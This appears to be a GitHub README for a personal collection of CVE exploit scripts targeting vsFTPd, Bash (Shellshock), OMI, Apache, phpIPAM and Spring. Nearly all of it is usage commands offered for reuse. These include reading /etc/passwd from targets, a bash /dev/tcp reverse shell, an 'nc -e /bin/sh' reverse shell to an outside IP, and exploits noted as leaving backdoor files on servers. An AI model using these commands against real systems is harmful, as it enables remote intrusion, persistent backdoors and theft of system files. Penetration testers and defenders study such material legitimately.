gwyomarch/CVE-Collection

VARIOUS CVE EXPLOITS FROM MY COLLECTION

FOR EDUCATIONAL PURPOSE ONLY

Written in python3, these scripts would probably have been cleaner. Feel free to hack and improve them to your liking.

vsFTPd 2.3.4 Backdoor exploit

CVE-2011-2523

Usage:

python3 exploit.py <TARGET_IP> (<TARGET_PORT>)

Examples:

python3 exploit.py 10.10.10.10
python3 exploit.py 10.10.10.10 21

"Shellshock" or "Bashdoor" (GNU Bash from version 1.14 to those lower than 4.3)

CVE-2014-6271

Usage:

python3 exploit.py <TARGET_URL> <COMMAND>

Examples:

python3 exploit.py http://10.10.60.20/cgi-bin/test.cgi 				(Default "cat /etc/passwd")
python3 exploit.py https://www.target.com/cgi-bin/file.cgi "cat /etc/passwd"
python3 exploit.py http://10.10.60.20/cgi-bin/test.cgi "bash -i >& /dev/tcp/10.10.10.10/1337 0>&1"

Open Management Infrastructure Remote Code Execution "OMIGOD" (1.6.8.0 and below)

CVE-2021-38647

Usage:

python3 exploit.py <TARGET_IP> <COMMAND>

Examples:

python3 exploit.py 10.10.10.10 "id"
python3 exploit.py 172.17.0.1 "cat /etc/passwd"

Apache 2.4.49 & 2.4.50 Path Traversal and Basic Unix Reverse Shell

CVE-2021-41773 & CVE-2021-42013

Usage:

python3 exploit.py <TARGET_URL> <FILE>

Examples:

python3 exploit.py https://www.target.com /etc/passwd
python3 exploit.py http://10.10.10.10 "/etc/passwd"

phpIPAM 1.4.5 - SQLI to Authenticated Remote Code Execution

CVE-2022-1223

<!> WARNING <!> THIS EXPLOIT LEAVES AN UNPROTECTED BACKDOOR FILE ON THE TARGET SERVER !

Usage:

python3 exploit.py <TARGET_URL> <USERNAME> <PASSWORD> <COMMAND>

Examples:

python3 exploit.py https://www.target.com "admin" 'P@ssw0rd123!' id
python3 exploit.py http://10.10.10.10 admin password "nc 10.10.10.255 1337 -e /bin/sh"

Spring Framework RCE (before 5.2) "Spring4Shell"

CVE-2022-22965

<!> WARNING <!> THIS EXPLOIT LEAVES A PASSWORD PROTECTED BACKDOOR FILE ON THE TARGET SERVER !

Usage:

python3 exploit.py <TARGET_URL>

Examples:

python3 exploit.py https://www.target.com
python3 exploit.py http://10.10.10.10